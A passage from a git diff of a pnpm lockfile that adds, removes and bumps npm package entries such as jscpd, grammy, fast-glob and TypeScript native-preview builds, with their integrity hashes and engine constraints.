sha512-DpzbrH7wIcBaJibpKo9nnSQL0MTRdnWttGyE5haGwK86xgMOkFLp7vEyfQPGLOJh5wNYiJ3V9PmUMDhV9u8kkQ==} + '@types/node@25.3.5': + resolution: {integrity: sha512-oX8xrhvpiyRCQkG1MFchB09f+cXftgIXb3a7UUa4Y3wpmZPw5tyZGTLWhlESOLq1Rq6oDlc8npVU2/9xiCuXMA==} '@types/qrcode-terminal@0.12.2': resolution: {integrity: sha512-v+RcIEJ+Uhd6ygSQ0u5YYY7ZM+la7GgPbs0V/7l/kFs2uO4S8BcIUEMoP7za4DNIqNnUD5npf0A/7kBhrCKG5Q==} @@ -3107,6 +3394,9 @@ packages: '@types/retry@0.12.0': resolution: {integrity: sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA==} + '@types/sarif@2.1.7': + resolution: {integrity: sha512-kRz0VEkJqWLf1LLVN4pT1cg1Z9wAuvI6L97V3m2f5B76Tg8d413ddvLBPTEHAZJlnn4XSvu0FkZtViCQGVyrXQ==} + '@types/send@0.17.6': resolution: {integrity: sha512-Uqt8rPBE8SY0RK8JB1EzVOIZ32uqy8HwdxCnoCOsYrvnswqmFZ/k+9Ikidlk/ImhsdvBsloHbAlewb2IEBV/Og==} @@ -3134,43 +3424,43 @@ packages: '@types/yauzl@2.10.3': resolution: {integrity: sha512-oJoftv0LSuaDZE3Le4DbKX+KS9G36NzOeSap90UIK0yMA/NhKJhqlSGtNDORNRaIbQfzjXDrQa0ytJ6mNRGz/Q==} - '@typescript/native-preview-darwin-arm64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-z8Efrjf04XjwX3QsLJARUMNl0/Bhe2z3iBbLI1hPAvqvkRK9C6T0Fywup3rEqBpUXCWsVjOyCxJjmuDA/9vZ5g==} + '@typescript/native-preview-darwin-arm64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-VpnrMP4iDLSTT9Hg/KrHwuIHLZr5dxYPMFErfv3ZDA0tv48u2H1lBhHVVMMopCuskuX3C35EOJbxLkxCJd6zDw==} cpu: [arm64] os: [darwin] - '@typescript/native-preview-darwin-x64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-qKySo/Tsya2zO3kIecrvP3WfEzS2GYy0qJwPmQ+LTqgONnuQJDohjyC3461cTKYBYL/kvkqfBrUGmjrg9fMyEA==} + '@typescript/native-preview-darwin-x64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-+4akGPxwfrPy2AYmQO1bp6CXxUVlBPrL0lSv+wY/E8vNGqwF0UtJCwAcR54ae1+k9EmoirT7Xn6LE3Io6mXntg==} cpu: [x64] os: [darwin] - '@typescript/native-preview-linux-arm64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-VNSRYpHbqnsJ18nO0buY85ZGloPoEi0W3rys93UzyZQGdxxqCKK5NxI+FV1siHNedFY2GRLr/7h1gZ8fcdeMvQ==} + '@typescript/native-preview-linux-arm64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-u4kXuHN2p+HeWsnTixoEOwALsCoS+n3/ukWdnV/mwyg6BKuuU69qCv3/miY6YPFtE7mUwzPdflEXsvkZJbJ/RA==} cpu: [arm64] os: [linux] - '@typescript/native-preview-linux-arm@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-os9ohNd3XSO3+jKgMo3Ac1L6vzqg2GY9gcBsjp6Z5NrnZtnbq6e+uHkqavsE73NP1VIAsjIwZThjw4zY9GY7bg==} + '@typescript/native-preview-linux-arm@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-E0Pve6BjTVvPiHq9cPVQu6fbW/Qo/CEs1VN2NMILd0xzFVpVd9FIvzV+Ft6pZilu1SBcihThW3sQ92l03Cw2+Q==} cpu: [arm] os: [linux] - '@typescript/native-preview-linux-x64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-w2iRqNEjvJbzqOYuRckpRBOJpJio2lOFTei7INQ0QED/TOO3XqJvAkyOzDrIgCO9YGWjDUIbuXZ/+4fldGIs3Q==} + '@typescript/native-preview-linux-x64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-MzuRjTYQIS7XrJcH0As18SbaQU+rFhf9LCpXs2QeHjhXQ33wjuFDNhQeurg2eKm6A0xE0GoW9K+sKsm8bhzzPg==} cpu: [x64] os: [linux] - '@typescript/native-preview-win32-arm64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-w6uu75HQek25Agu5+CcpzPS9PN3NTEyHSNMp9oypR8dj7zPRsudM8M4vhFTMDVCZ/lX/mWXkgG8dHmI+myWWvw==} + '@typescript/native-preview-win32-arm64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-UNZl8Q6lx1njEPU8+FNjYvqii5PtDjk6cyxmVPwwJI2Snz5T5qY6oadkUds6CJsLkt7s4UB3P5XgLu1+vwoYGw==} cpu: [arm64] os: [win32] - '@typescript/native-preview-win32-x64@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-r2T4W5oYhOHAOVE0U/L1aFCsNDhv0BIRtyk9pL3eqGPLoYH4vtR96/CIpsVt04JDuh0fxOBHcbVjWaZdeZaTCQ==} + '@typescript/native-preview-win32-x64@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-aPJb4v0Df9GzWFWbO4YbLg0OjmjxZgXngkF1M746r4CgOdydWgosNPWypzzAwiliGKvCLwfAWYiV+T5Jf1vQ3g==} cpu: [x64] os: [win32] - '@typescript/native-preview@7.0.0-dev.20260301.1': - resolution: {integrity: sha512-hmQSkgiIDAzdjyk4P8/dU8lLch1sR8spamGZ/ypPkz3rmraiLaeDj6rqlrgyZNOcSpk0R3kXw3y5qJ9121gjNQ==} + '@typescript/native-preview@7.0.0-dev.20260307.1': + resolution: {integrity: sha512-NcKdPiGjxxxdh7fLgRKTrn5hLntbt89NOodNaSrMChTfJwvLaDkgrRlnO7v5x+m7nQc87Qf1y7UoT1ZEZUBB4Q==} hasBin: true '@typespec/ts-http-runtime@0.3.3': @@ -3184,9 +3474,6 @@ packages: resolution: {integrity: sha512-N8/FHc/lmlMDCumMuTXyRHCxlov5KZY6unmJ9QR2GOw+OpROZMBsXYGwE+ZMtvN21ql9+Xb8KhGNBj08IrG3Wg==} engines: {node: '>=16', npm: '>=8'} - '@urbit/http-api@3.0.0': - resolution: {integrity: sha512-EmyPbWHWXhfYQ/9wWFcLT53VvCn8ct9ljd6QEe+UBjNPEhUPOFBLpDsDp3iPLQgg8ykSU8JMMHxp95LHCorExA==} - '@urbit/nockjs@1.6.0': resolution: {integrity: sha512-f2xCIxoYQh+bp/p6qztvgxnhGsnUwcrSSvW2CUKX7BPPVkDNppQCzCVPWo38TbqgChE7wh6rC1pm6YNCOyFlQA==} @@ -3295,6 +3582,11 @@ packages: peerDependencies: acorn: ^8 + acorn@7.4.1: + resolution: {integrity: sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==} + engines: {node: '>=0.4.0'} + hasBin: true + acorn@8.16.0: resolution: {integrity: sha512-UVJyE9MttOsBQIDKw1skb9nAwQuR5wuGD3+82K6JgJlm/Y+KI92oNsMNGZCYdDsVtRHSak0pcV5Dno5+4jh9sw==} engines: {node: '>=0.4.0'} @@ -3384,9 +3676,15 @@ packages: array-flatten@1.1.1: resolution: {integrity: sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==} + asap@2.0.6: + resolution: {integrity: sha512-BSHWgDSAiKs50o2Re8ppvp3seVHXSRM44cdSsT9FfNEUUZLOGWVCsiWaRPWM1Znn+mqZ1OfVZ3z3DWEzSp7hRA==} + asn1@0.2.6: resolution: {integrity: sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==} + assert-never@1.4.0: + resolution: {integrity: sha512-5oJg84os6NMQNl27T9LnZkvvqzvAnHu03ShCnoj6bsJwS7L8AO4lf+C/XjK/nvzEqQB744moC6V128RucQd1jA==} + assert-plus@1.0.0: resolution: {integrity: sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==} engines: {node: '>=0.8'} @@ -3449,6 +3747,13 @@ packages: react-native-b4a: optional: true + babel-walk@3.0.0-canary-5: + resolution: {integrity: sha512-GAwkz0AihzY5bkwIY5QDR+LvsRQgB/B+1foMPvi0FZPMl5fjD7ICiznUiBdLYMH1QYe6vqu4gWYytZOccLouFw==} + engines: {node: '>= 10.0.0'} + + badgen@3.2.3: + resolution: {integrity: sha512-svDuwkc63E/z0ky3drpUppB83s/nlgDciH9m+STwwQoWyq7yCgew1qEfJ+9axkKdNq7MskByptWUN9j1PGMwFA==} + balanced-match@4.0.4: resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} engines: {node: 18 || 20 || >=22} @@ -3488,6 +3793,10 @@ packages: birpc@4.0.0: resolution: {integrity: sha512-LShSxJP0KTmd101b6DRyGBj57LZxSDYWKitQNW/mi8GRMvZb078Uf9+pveax1DrVL89vm7mWe+TovdI/UDOuPw==} + blamer@1.0.7: + resolution: {integrity: sha512-GbBStl/EVlSWkiJQBZps3H1iARBrC7vt++Jb/TTmCNu/jZ04VW7tSN1nScbFXBUy1AN+jzeL7Zep9sbQxLhXKA==} + engines: {node: '>=8.9'} + bluebird@3.7.2: resolution: {integrity: sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==} @@ -3512,8 +3821,9 @@ packages: resolution: {integrity: sha512-fy6KJm2RawA5RcHkLa1z/ScpBeA762UF9KmZQxwIbDtRJrgLzM10depAiEQ+CXYcoiqW1/m96OAAoke2nE9EeA==} engines: {node: 18 || 20 || >=22} - browser-or-node@1.3.0: - resolution: {integrity: sha512-0F2z/VSnLbmEeBcUrSuDH5l0HxTXdQQzLjkmBR4cYfvg1zJrKSlmIZFqyFR8oX0NrwPhy3c3HQ6i3OxMbew4Tg==} + braces@3.0.3: + resolution: {integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==} + engines: {node: '>=8'} browser-or-node@3.0.0: resolution: {integrity: sha512-iczIdVJzGEYhP5DqQxYM9Hh7Ztpqqi+CXZpSmX8ALFs9ecXkQIeqRyM6TfxEfMVpwhl3dSuDvxdzzo9sUOIVBQ==} @@ -3537,9 +3847,9 @@ packages: resolution: {integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==} engines: {node: '>= 0.8'} - cac@6.7.14: - resolution: {integrity: sha512-b6Ilus+c3RrdDk+JhLKUAQfzzgLEPy6wcXqS7f/xe1EETvsDP6GORG7SFuOs6cID5YkqchW/LXZbX5bc8j7ZcQ==} - engines: {node: '>=8'} + cac@7.0.0: + resolution: {integrity: sha512-tixWYgm5ZoOD+3g6UTea91eow5z6AAHaho3g0V9CNSNb45gM8SmflpAc+GRd1InC4AqN/07Unrgp56Y94N9hJQ==} + engines: {node: '>=20.19.0'} cacheable@2.3.2: resolution: {integrity: sha512-w+ZuRNmex9c1TR9RcsxbfTKCjSL0rh1WA5SABbrWprIHeNBdmyQLSYonlDy9gpD+63XT8DgZ/wNh1Smvc9WnJA==} @@ -3580,6 +3890,9 @@ packages: character-entities-legacy@3.0.0: resolution: {integrity: sha512-RpPp0asT/6ufRm//AJVwpViZbGM/MkjQFxJccQRHmISF/22NBtsHqAWmL+/pmkPWoIUJdWyeVleTl1wydHATVQ==} + character-parser@2.2.0: + resolution: {integrity: sha512-+UqJQjFEFaTAs3bNsF2j2kEN1baG/zghZbdqoYEDxGZtJo9LBzl1A+m0D4n3qKx8N2FNv8/Xp6yV9mQmBuptaw==} + chmodrp@1.0.2: resolution: {integrity: sha512-TdngOlFV1FLTzU0o1w8MB6/BFywhtLC0SzRTGJU7T9lmdjlCWeMRt1iVo0Ki+ldwNk0BqNiKoc8xpLZEQ8mY1w==} @@ -3615,6 +3928,10 @@ packages: resolution: {integrity: sha512-bXfOC4QcT1tKXGorxL3wbJm6XJPDqEnij2gQ2m7ESQuE+/z9YFIWnl/5RpTiKWbMq3EVKR4fRLJGn6DVfu0mpw==} engines: {node: '>=18.20'} + cli-table3@0.6.5: + resolution: {integrity: sha512-+W/5efTR7y5HRD7gACw9yQjqMVvEMLBHmboM/kPWam+H+Hmyrgjh6YncVKK122YZkXrLudzTuAukUw9FnMf7IQ==} + engines: {node: 10.* || >= 12.*} + cliui@7.0.4: resolution: {integrity: sha512-OcRE68cOsVMXp1Yvonl/fzkQOyjLSu/8bhPDfQt0e0/Eb283TKP20Fs2MqoPsr9SwA595rRCA+QMzYc9nBP+JQ==} @@ -3641,6 +3958,10 @@ packages: resolution: {integrity: sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==} hasBin: true + colors@1.4.0: + resolution: {integrity: sha512-a+UqTh4kgZg/SlGvfbzDHpgRu7AAQOmmqRHJnxhRZICKFUT91brVhNNt58CMWU9PsBbv3PDCZUHbVxuDiH2mtA==} + engines: {node: '>=0.1.90'} + combined-stream@1.0.8: resolution: {integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==} engines: {node: '>= 0.8'} @@ -3668,9 +3989,16 @@ packages: resolution: {integrity: sha512-H+y0Jo/T1RZ9qPP4Eh1pkcQcLRglraJaSLoyOtHxu6AapkjWVCy2Sit1QQ4x3Dng8qDlSsZEet7g5Pq06MvTgw==} engines: {node: '>=20'} + commander@5.1.0: + resolution: {integrity: sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==} + engines: {node: '>= 6'} + console-control-strings@1.1.0: resolution: {integrity: sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==} + constantinople@4.0.1: + resolution: {integrity: sha512-vCrqcSIq4//Gx74TXXCGnHpulY1dskqLTFGDmhrGxzeXL8lF8kvXv6mpNWlJj1uD4DW23D4ljAqbY4RRaaUZIw==} + content-disposition@0.5.4: resolution: {integrity: sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==} engines: {node: '>= 0.6'} @@ -3694,9 +4022,6 @@ packages: resolution: {integrity: sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==} engines: {node: '>= 0.6'} - core-js@3.48.0: - resolution: {integrity: sha512-zpEHTy1fjTMZCKLHUZoVeylt9XrzaIN2rbPXEt0k+q7JE5CkCZdo6bNq55bn24a69CH7ErAVLKijxJja4fw+UQ==} - core-util-is@1.0.2: resolution: {integrity: sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==} @@ -3810,6 +4135,12 @@ packages: discord-api-types@0.38.40: resolution: {integrity: sha512-P/His8cotqZgQqrt+hzrocp9L8RhQQz1GkrCnC9TMJ8Uw2q0tg8YyqJyGULxhXn/8kxHETN4IppmOv+P2m82lQ==} + discord-api-types@0.38.41: + resolution: {integrity: sha512-yMECyR8j9c2fVTvCQ+Qc24pweYFIZk/XoxDOmt1UvPeSw5tK6gXBd/2hhP+FEAe9Y6ny8pRMaf618XDK4U53OQ==} + + doctypes@1.1.0: + resolution: {integrity: sha512-LLBi6pEqS6Do3EKQ3J0NqHWV5hhb78Pi8vvESYwyOy2c31ZEZVdtitdzsQsKb7878PEERhzUk0ftqGhG6Mz+pQ==} + dom-serializer@2.0.0: resolution: {integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==} @@ -3961,6 +4292,10 @@ packages: events-universal@1.0.1: resolution: {integrity: sha512-LUd5euvbMLpwOF8m6ivPCbhQeSiYVNb8Vs0fQ8QjXo0JTkEHpz8pxdQf0gStltaPpw0Cca8b39KxvK9cfKRiAw==} + execa@4.1.0: + resolution: {integrity: sha512-j5W0//W7f8UxAn8hXVnwG8tLwdiUy4FJLcSupCg6maBYZDpyBvTApK7KyuI4bKj8KOh1r2YH+6ucuYtJv1bTZA==} + engines: {node: '>=10'} + expect-type@1.3.0: resolution: {integrity: sha512-knvyeauYhqjOYvQ66MznSMs83wmHrCycNEN6Ao+2AeYEfxUIkuiVxdEa1qlGEPK+We3n0THiDciYSsCcgW/DoA==} engines: {node: '>=12.0.0'} @@ -3997,6 +4332,10 @@ packages: fast-fifo@1.3.2: resolution: {integrity: sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==} + fast-glob@3.3.3: + resolution: {integrity: sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==} + engines: {node: '>=8.6.0'} + fast-uri@3.1.0: resolution: {integrity: sha512-iPeeDKJSWf4IEOasVVrknXpaBV0IApz/gp7S2bb7Z4Lljbl2MGJRqInZiUrQwV16cpzw/D3S5j5Julj/gT52AA==} @@ -4004,6 +4343,9 @@ packages: resolution: {integrity: sha512-53jIF4N6u/pxvaL1eb/hEZts/cFLWZ92eCfLrNyCI0k38lettCG/Bs40W9pPwoPXyHQlKu2OUbQtiEIZK/J6Vw==} hasBin: true + fastq@1.20.1: + resolution: {integrity: sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==} + fd-slicer@1.1.0: resolution: {integrity: sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==} @@ -4032,6 +4374,10 @@ packages: resolution: {integrity: sha512-vqIlNogKeyD3yzrm0yhRMQg8hOVwYcYRfjEoODd49iCprMn4HL85gK3HcykQE53EPIpX3HcAbGA5ELQv216dAQ==} engines: {node: '>=16'} + fill-range@7.1.1: + resolution: {integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==} + engines: {node: '>=8'} + finalhandler@1.3.2: resolution: {integrity: sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==} engines: {node: '>= 0.8'} @@ -4147,6 +4493,14 @@ packages: getpass@0.1.7: resolution: {integrity: sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==} + gitignore-to-glob@0.3.0: + resolution: {integrity: sha512-mk74BdnK7lIwDHnotHddx1wsjMOFIThpLY3cPNniJ/2fA/tlLzHnFxIdR+4sLOu5KGgQJdij4kjJ2RoUNnCNMA==} + engines: {node: '>=4.4 <5 || >=6.9'} + + glob-parent@5.1.2: + resolution: {integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==} + engines: {node: '>= 6'} + glob-to-regexp@0.4.1: resolution: {integrity: sha512-lkX1HJXwyMcprw/5YUZc2s7DrpAiHB21/V+E1rHUrVNokkvB6bqMzT0VfV6/86ZNabt1k14YOIaT7nDvOX3Iiw==} @@ -4182,6 +4536,10 @@ packages: resolution: {integrity: sha512-CAAu74SLT+/QCg40FBhUuYJalVsxxCN3D0c31TzhFBsWWTdXrMXYjGsKngBdfvN6hQ/VzHczluj/ugZVetFNCQ==} engines: {node: ^12.20.0 || >=14.13.1} + grammy@1.41.1: + resolution: {integrity: sha512-wcHAQ1e7svL3fJMpDchcQVcWUmywhuepOOjHUHmMmWAwUJEIyK5ea5sbSjZd+Gy1aMpZeP8VYJa+4tP+j1YptQ==} + engines: {node: ^12.20.0 || >=14.13.1} + has-flag@4.0.0: resolution: {integrity: sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==} engines: {node: '>=8'} @@ -4277,6 +4635,10 @@ packages: resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} engines: {node: '>= 14'} + human-signals@1.1.1: + resolution: {integrity: sha512-SEQu7vl8KjNL2eoGBLF3+wAjpsNfA9XMlXAYj/3EdaNfAlxKthD1xjEQfGOUhllCGGJVNY34bRr6lPINhNjyZw==} + engines: {node: '>=8.12.0'} + iconv-lite@0.4.24: resolution: {integrity: sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==} engines: {node: '>=0.10.0'} @@ -4295,8 +4657,9 @@ packages: immediate@3.0.6: resolution: {integrity: sha512-XXOFtyqDjNDAQxVfYxuF7g9Il/IbWmmlQg2MYKOH8ExIT1qg6xc4zyS3HaEEATgs1btfzxq15ciUiY7gjSXRGQ==} - import-in-the-middle@2.0.6: - resolution: {integrity: sha512-3vZV3jX0XRFW3EJDTwzWoZa+RH1b8eTTx6YOCjglrLyPuepwoBti1k3L2dKwdCUrnVEfc5CuRuGstaC/uQJJaw==} + import-in-the-middle@3.0.0: + resolution: {integrity: sha512-OnGy+eYT7wVejH2XWgLRgbmzujhhVIATQH0ztIeRilwHBjTeG3pD+XnH3PKX0r9gJ0BuJmJ68q/oh9qgXnNDQg==} + engines: {node: '>=18'} import-without-cache@0.2.5: resolution: {integrity: sha512-B6Lc2s6yApwnD2/pMzFh/d5AVjdsDXjgkeJ766FmFuJELIGHNycKRj+l3A39yZPM4CchqNCB4RITEAYB1KUM6A==} @@ -4332,9 +4695,20 @@ packages: ircv3@0.33.0: resolution: {integrity: sha512-7rK1Aial3LBiFycE8w3MHiBBFb41/2GG2Ll/fR2IJj1vx0pLpn1s+78K+z/I4PZTqCCSp/Sb4QgKMh3NMhx0Kg==} + is-core-module@2.16.1: + resolution: {integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==} + engines: {node: '>= 0.4'} + is-electron@2.2.2: resolution: {integrity: sha512-FO/Rhvz5tuw4MCWkpMzHFKWD2LsfHzIb7i6MdPYZ/KW7AlxawyLkqdy+jPZP1WubqEADE3O4FUENlJHDfQASRg==} + is-expression@4.0.0: + resolution: {integrity: sha512-zMIXX63sxzG3XrkHkrAPvm/OVZVSCPNkwMHU8oTX7/U3AL78I0QXCEICXUM13BIa8TYGZ68PiTKfQz3yaTNr4A==} + + is-extglob@2.1.1: + resolution: {integrity: sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==} + engines: {node: '>=0.10.0'} + is-fullwidth-code-point@3.0.0: resolution: {integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==} engines: {node: '>=8'} @@ -4343,10 +4717,18 @@ packages: resolution: {integrity: sha512-5XHYaSyiqADb4RnZ1Bdad6cPp8Toise4TzEjcOYDHZkTCbKgiUl7WTUCpNWHuxmDt91wnsZBc9xinNzopv3JMQ==} engines: {node: '>=18'} + is-glob@4.0.3: + resolution: {integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==} + engines: {node: '>=0.10.0'} + is-interactive@2.0.0: resolution: {integrity: sha512-qP1vozQRI+BMOPcjFzrjXuQvdak2pHNUMZoeG2eRbiSqyvbEf/wQtEOTOX1guk6E3t36RkaqiSt8A/6YElNxLQ==} engines: {node: '>=12'} + is-number@7.0.0: + resolution: {integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==} + engines: {node: '>=0.12.0'} + is-plain-object@5.0.0: resolution: {integrity: sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==} engines: {node: '>=0.10.0'} @@ -4357,6 +4739,10 @@ packages: is-promise@4.0.0: resolution: {integrity: sha512-hvpoI6korhJMnej285dSg6nu1+e6uxs7zG3BYAm5byqDsgJNWwxzM6z6iZiAgQR4TJ30JmBTOwqZUw3WlyH3AQ==} + is-regex@1.2.1: + resolution: {integrity: sha512-MjYsKHO5O7mCsmRGxWcLWheFqN9DJ/2TmngvjKXihe6efViPqc274+Fx/4fYj/r03+ESvBdTXK0V6tA3rgez1g==} + engines: {node: '>= 0.4'} + is-stream@2.0.1: resolution: {integrity: sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==} engines: {node: '>=8'} @@ -4403,12 +4789,22 @@ packages: jose@4.15.9: resolution: {integrity: sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==} + js-stringify@1.0.2: + resolution: {integrity: sha512-rtS5ATOo2Q5k1G+DADISilDA6lv79zIiwFd6CcjuIxGKLFm5C+RLImRscVap9k55i+MOZwgliw+NejvkLuGD5g==} + js-tokens@10.0.0: resolution: {integrity: sha512-lM/UBzQmfJRo9ABXbPWemivdCW8V2G8FHaHdypQaIy523snUjog0W71ayWXTjiR+ixeMyVHN2XcpnTd/liPg/Q==} jsbn@0.1.1: resolution: {integrity: sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==} + jscpd-sarif-reporter@4.0.6: + resolution: {integrity: sha512-b9Sm3IPZ3+m8Lwa4gZa+4/LhDhlc/ZLEsLXKSOy1DANQ6kx0ueqZT+fUHWEdQ6m0o3+RIVIa7DmvLSojQD05ng==} + + jscpd@4.0.8: + resolution: {integrity: sha512-d2VNT/2Hv4dxT2/59He8Lyda4DYOxPRyRG9zBaOpTZAqJCVf2xLrBlZkT8Va6Lo9u3X2qz8Bpq4HrDi4JsrQhA==} + hasBin: true + jsesc@3.1.0: resolution: {integrity: sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==} engines: {node: '>=6'} @@ -4453,6 +4849,9 @@ packages: resolution: {integrity: sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==} engines: {'0': node >=0.6.0} + jstransformer@1.0.0: + resolution: {integrity: sha512-C9YK3Rf8q6VAPDCCU9fnqo3mAfOH6vUGnMcP4AQAYIEpWtfGLpwOTmZ+igtdK5y+VvI2n3CyYSzy4Qh34eq24A==} + jszip@3.10.1: resolution: {integrity: sha512-xXDvecyTpGLrqFrvkrUSoxxfJI5AH7U8zxxtVclpsUtMCq4JQ290LY8AW5c7Ggnr/Y/oK+bQMbqK2qmtk3pN4g==} @@ -4684,13 +5083,16 @@ packages: resolution: {integrity: sha512-BuU2qnTti9YKgK5N+IeMubp14ZUKUUw7yeJbkjtosvHiP0AZ5c8IAgEMk79D0eC8F23r4Ac/q8cAIFdm2FtyoA==} hasBin: true + markdown-table@2.0.0: + resolution: {integrity: sha512-Ezda85ToJUBhM6WGaG6veasyym+Tbs3cMAw/ZhOPqXiYsr0jgocBV3j3nx+4lk47plLlIqjwuTm/ywVI+zjJ/A==} + marked@15.0.12: resolution: {integrity: 